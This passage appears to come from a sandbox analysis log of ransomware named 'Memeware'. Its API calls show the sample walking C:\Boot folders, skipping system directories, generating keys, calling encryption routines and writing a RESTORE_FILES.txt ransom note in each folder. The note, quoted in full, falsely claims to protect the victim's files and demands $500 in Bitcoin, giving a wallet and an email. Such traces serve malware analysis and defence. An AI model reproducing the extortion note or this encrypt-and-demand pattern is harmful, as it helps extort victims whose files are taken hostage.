lpString2="Program Files") returned -1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="Program Files (x86)") returned -1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="$Recycle.bin") returned 1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="System Volume Information") returned -1 [0044.566] 
wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0044.566] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0044.566] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0044.566] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0044.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.566] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.566] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.567] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.567] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.567] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.567] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0044.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.567] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.567] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.567] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.567] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.567] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.567] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.567] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0044.567] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.567] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.567] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) 
returned 1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.567] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0044.567] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.567] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.567] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.567] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.568] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.568] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.568] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\RESTORE_FILES.txt") returned 35 [0044.568] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\RESTORE_FILES.txt" (normalized: "c:\\boot\\da-dk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.568] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.568] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.569] lstrlenA (lpString="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") returned 684 [0044.569] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.569] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.569] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.569] CloseHandle (hObject=0xa4) returned 1 [0044.569] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="Program Files") returned -1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="Program Files (x86)") returned -1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="$Recycle.bin") returned 1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="System Volume Information") returned -1 [0044.569] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0044.570] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0044.570] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0044.570] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0044.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.570] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.570] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.570] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.570] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.570] lstrcmpiW 
(lpString1=".", lpString2="System Volume Information") returned -1 [0044.570] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0044.570] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.570] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.570] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.570] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.570] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.570] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.570] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.570] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0044.570] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.570] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.570] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.570] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.570] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.570] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.570] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.571] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.571] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0044.571] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.571] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.571] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.571] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.571] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.571] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.571] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.571] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\RESTORE_FILES.txt") returned 35 [0044.571] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\RESTORE_FILES.txt" (normalized: "c:\\boot\\de-de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.571] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.571] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.572] lstrlenA (lpString="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") returned 684 [0044.572] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.572] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.572] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.572] CloseHandle (hObject=0xa4) returned 1 [0044.572] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.572] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0044.572] lstrcmpiW (lpString1="el-GR", lpString2="Program Files") returned -1 [0044.572] lstrcmpiW (lpString1="el-GR", lpString2="Program Files (x86)") returned -1 [0044.573] lstrcmpiW (lpString1="el-GR", lpString2="$Recycle.bin") returned 1 [0044.573] lstrcmpiW (lpString1="el-GR", lpString2="System Volume Information") returned -1 [0044.573] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0044.573] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0044.573] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0044.573] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0044.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.573] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.573] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.573] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.573] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.573] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.573] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0044.573] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.573] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.573] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.573] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.573] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.573] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.573] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.573] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0044.573] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.573] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.573] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.573] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0044.573] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.573] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.573] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.573] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.574] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.574] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.574] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.574] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\RESTORE_FILES.txt") returned 35 [0044.574] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\el-gr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.574] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.574] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.575] lstrlenA (lpString="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") returned 684 [0044.575] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.575] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.575] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.575] CloseHandle (hObject=0xa4) returned 1 [0044.575] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0044.576] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0044.576] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0044.576] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0044.576] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0044.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.576] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.576] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.576] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.576] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.576] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0044.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.576] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.576] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.576] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.576] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.576] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.576] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.576] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0044.576] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.576] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.576] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.576] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0044.576] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.576] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.576] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.576] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.576] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.577] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0044.577] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0044.577] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".protected") returned 0x0 [0044.577] lstrcmpW (lpString1="memtest.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.577] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.577] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.577] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.577] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.577] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.577] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\RESTORE_FILES.txt") returned 35 [0044.577] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\RESTORE_FILES.txt" (normalized: 
